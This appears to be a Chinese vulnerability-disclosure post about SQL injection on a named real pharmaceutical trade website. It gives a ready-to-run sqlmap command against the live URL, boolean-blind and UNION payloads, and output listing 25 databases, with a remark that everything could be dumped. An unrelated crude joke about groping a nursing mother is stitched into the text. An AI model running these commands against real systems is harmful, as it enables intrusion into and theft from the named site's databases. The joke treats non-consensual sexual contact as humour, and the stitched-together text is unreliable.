2014-05-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-06-24: 厂商已经主动忽略漏洞,细节向公众公开
读书时一直暗恋一个女孩,但没勇气表白,更没胆量碰她。毕业后,她已经结婚了而且有孩子了。一天下午,我看到她抱着娃娃在喂奶,我找了个很好的借口。我走到她面前,一把两手按住她的咪咪,然后跟她娃娃说,喊叔叔,不喊不给吃!~~
浙江网盛生意宝 看样子很大的公司 应该不会忽略吧。sqlmap.py -u "http://expo.pharmnet.com.cn/pro_product/browse.cgi?id=489966&asid=114479 asid=114479" --dbs
注入点 :
sqlmap.py -u "http://expo.pharmnet.com.cn/pro_product/browse.cgi?id=489966&asid=114479 asid=114479" --dbssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=489966 AND 8374=8374&asid=114479 asid=114479 Type: UNION query Title: MySQL UNION query (NULL) - 84 columns Payload: id=-1616 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a617171,0x676e7a444c7059546879,0x716c686271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&asid=114479 asid=114479---[19:20:37] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5[19:20:37] [INFO] fetching database names[19:20:37] [INFO] the SQL query used returns 25 entriesavailable databases [25]:[*] adsadmin_business[*] adsadmin_hub[*] bbs[*] bbs_pharmnet[*] chinafdc_law_com[*] chinapharmnet[*] dissertation[*] drugforum[*] fdc_law_com_cn[*] fdc_new[*] fdc_new_bak[*] information_schema[*] net_articles[*] netsun_cate[*] netsun_ecp[*] netsun_forum[*] netsun_key[*] netsun_Q[*] pharm[*] pharm_Q[*] pharm_search[*] pharmnet[*] service[*] session_tmps[*] test
权限蛮大 好像都能脱 未深入。
求不忽略。
未能联系到厂商或者厂商积极拒绝
